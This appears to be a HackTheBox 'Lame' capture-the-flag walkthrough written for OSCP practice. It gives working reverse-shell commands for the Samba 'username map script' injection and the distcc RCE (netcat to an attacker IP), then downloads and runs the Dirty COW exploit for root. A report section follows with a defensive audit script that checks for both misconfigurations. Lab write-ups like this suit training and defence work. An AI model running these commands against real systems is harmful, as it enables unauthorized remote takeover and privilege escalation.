Lame — HacktheBox Writeup (OSCP)
Recon
First thing, I run a scan with AutoRecon. While that is going, I’ll run a quick nmap scan to get started.
nmap -sC -sV -Pn -T4 10.10.10.3
From our nmap scan we get back
A couple of things to note off the bat: vsftpd, OpenSSH, and Samba are running outdated versions. Also, we have anonymous FTP access.
FTP
Since we have anonymous FTP access, time to see what's there.
Well that was a dead end. Nothing there and no write access.
Next, I check to see if there are any exploits for this version of vsftpd.
I tested this one earlier but it did not work for me.
SMB
smbclient -L 10.10.10.3
Let's see if we can list the contents of any of these shares (AutoRecon will automatically run this).
smbmap -H 10.10.10.3 -P 139 -R
Well, we only have access to tmp and there’s nothing interesting.
Let’s see what we can find with searchsploit.
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) looks interesting. Run searchsploit -p 16320, which copies the path to my clipboard. From there, type cat and paste the path (Ctrl+Shift+v).
After looking over the code we can get a pretty good idea of what it is doing here. Time to connect to SMB:
smbclient //10.10.10.3/tmp
Once connected, we need to start a listener on our box:
nc -lvp 1234
After that is running, we need to run the following in the smbclient session:
logon "./=`nohup nc -e /bin/bash <attackers-ip> <port>`"
There we go. Now we have root.
Method 2: DistCC
Looking through the results from my AutoRecon scan I come across another exploit.
nmap -vv --reason -Pn -sV -p 3632 --script="banner,distcc-cve2004-2687" --script-args="distcc-cve2004-2687.cmd=id" 10.10.10.3
Change this up a bit and we could get a reverse shell:
nmap -vv --reason -Pn -sV -p 3632 10.10.10.3 --script="banner,distcc-cve2004-2687" --script-args="distcc-cve2004-2687.cmd=nc -nv <attackers-ip> <port> -e /bin/bash"
Or, there's a Python script you can get off GitHub:
(CVE-2004-2687) DistCC Daemon — Command Execution (Python) (github.com)
python poc.py -t 10.10.10.3 -p 3632 -c "nc <attackers-ip> <port> -e /bin/bash"
PrivEsc
Now that we have our foothold, let's check the kernel version.
Run uname -r
Found the exploit below.
On your machine, start a Python server in the directory where you saved the exploit:
python -m SimpleHTTPServer 81
On the victim PC, use wget to download the exploit:
wget http://<attacker-ip>:<port>/<exploit>
Now we just need to compile it.
gcc -pthread dirty.c -o dirty -lcrypt
Then run it:
./dirty
It will prompt you to enter a new password.
All that's left is to SSH into the server with the new user and password:
ssh firefart@10.10.10.3
Report
I am using whoisflynn/OSCP-Exam-Report-Template ("Modified template for the OSCP Exam and Labs. Used during my passing attempt", github.com) for my report template. Below you'll see a brief sample of the report on this machine.
System IP: 10.10.10.3
Service Enumeration
Ports Open
TCP: 21, 22, 139, 445, 3632
UDP: None
Nmap Scan Results:
Initial Shell Vulnerability Exploited: (CVE-2004-2687) DistCC Daemon — Command Execution
Vulnerability Explanation:
distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Vulnerability Fix: Upgrade distcc to version 3.3 or newer (link)
Severity:
Base Score: 9.3 HIGH
Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit Code Here: https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Initial Shell Screenshot:
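The two findings in this report both come down to configuration a defender can check for: a distccd that is not restricted to trusted networks, and a Samba "username map script" directive in smb.conf. The audit script below is an added example, not part of this writeup or of either project; it assumes the Debian/Ubuntu /etc/default/distcc layout (STARTDISTCC and ALLOWEDNETS variables, which the init script turns into --allow arguments) and runs against constructed copies of both files.

```python
import ipaddress
import re
import shlex

# Constructed /etc/default/distcc (Debian/Ubuntu packaging), not taken from the box.
SAMPLE_DEFAULT_DISTCC = 'STARTDISTCC="true"\nALLOWEDNETS="0.0.0.0/0"\nLISTENER="0.0.0.0"\n'

# Constructed smb.conf fragment carrying the directive abused in this writeup.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

def shell_assignments(text):
    """Collect KEY="value" lines from a sourced shell defaults file."""
    pairs = re.findall(r'^\s*([A-Za-z_]\w*)=(.*)$', text, re.MULTILINE)
    return {key: " ".join(shlex.split(val, comments=True)) for key, val in pairs}

def distcc_findings(default_distcc):
    """Flag a distccd that is enabled and accepts jobs from any source network."""
    cfg = shell_assignments(default_distcc)
    if cfg.get("STARTDISTCC", "").lower() != "true":
        return []  # daemon not started by this file; nothing to flag
    nets = cfg.get("ALLOWEDNETS", "").split()
    findings = [] if nets else ["distcc: ALLOWEDNETS empty, no --allow restriction passed"]
    for net in nets:
        try:
            if ipaddress.ip_network(net, strict=False).prefixlen == 0:
                findings.append(f"distcc: ALLOWEDNETS {net} admits any source address")
        except ValueError:
            findings.append(f"distcc: unparsable ALLOWEDNETS entry {net!r}")
    return findings

def samba_findings(smb_conf):
    """Flag 'username map script' in [global]; Samba ignores case and spaces in keys."""
    findings, section = [], None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue  # comments start the line in smb.conf
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, _, value = line.partition("=")
        if section == "global" and "".join(key.split()).lower() == "usernamemapscript":
            findings.append(f"samba: username map script = {value.strip()!r} in [global]")
    return findings
```

Run distcc_findings and samba_findings over the real files on a host you administer; an empty list from both means neither misconfiguration is present, while the daemon version itself still has to be checked separately.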
Privilege Escalation
Vulnerability Exploited: Dirty COW (CVE-2016-5195)
Vulnerability Explanation:
Dirty COW (CVE-2016-5195) is a privilege escalation vulnerability in the Linux kernel which allows an unprivileged local user to gain write access to otherwise read-only memory mappings, and thus to increase their privileges on the system.
Vulnerability Fix: Upgrade to Ubuntu 12.04 LTS or newer (link)
Severity:
Base Score: 7.8 HIGH
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit Code: https://www.exploit-db.com/exploits/40839
Proof Screenshot Here: